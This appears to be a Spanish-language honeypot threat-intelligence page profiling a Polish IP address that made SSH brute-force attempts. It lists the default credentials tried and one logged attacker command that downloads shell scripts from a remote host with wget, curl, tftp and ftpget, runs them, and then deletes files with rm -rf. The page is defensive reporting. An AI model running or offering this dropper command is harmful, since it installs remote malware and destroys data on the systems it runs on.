Amenaza ActivaBAJO

151.115.110.102

Pais de Origen🇵🇱 Polonia
Primera Deteccion11/1/2026
Ultima Actividad11/1/2026
ISPScaleway S.a.s.
🎯
183
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
0
Malware

Geolocalizacion

Pais
🇵🇱 Polonia
Ciudad
Warsaw
ASN
AS12876
ISP
Scaleway S.a.s.

Tipos de Ataque

cowrie

Puertos Atacados

22

Malware Asociado

Sin malware asociado

Credenciales Intentadas

🔐testuser/testuser
2x
🔐oracle/oracle
1x
🔐root/123456
1x
🔐root/1234567890
1x
🔐dev/dev
1x
🔐root/test
1x
🔐ansible/ansible
1x
🔐system/system
1x
🔐ubnt/ubnt
1x
🔐root/toor
1x
🔐root/redhat
1x
🔐pilinux/pilinux123
1x
🔐postgres/postgres
1x
🔐butter/xuelp123
1x
🔐server/server
1x

Comandos Ejecutados

$cd /tmp cd /var/run cd /mnt cd /root ; cd /; wget http://195.24.237.39/skid.sh; curl -O http://195.24.237.39/skid.sh; chmod 777 skid.sh; sh skid.sh; tftp 195.24.237.39 -c get skid.sh; chmod 777 skid.sh; sh skid.sh; tftp -r skid2.sh -g 195.24.237.39; chmod 777 skid2.sh; sh skid2.sh; ftpget -v -u anonymous -p anonymous -P 21 195.24.237.39 skid1.sh skid1.sh; sh skid1.sh; rm -rf skid.sh skid.sh skid2.sh skid1.sh; rm -rf *1x

Evaluacion de Riesgo

35
/100
BajoMedioAltoCritico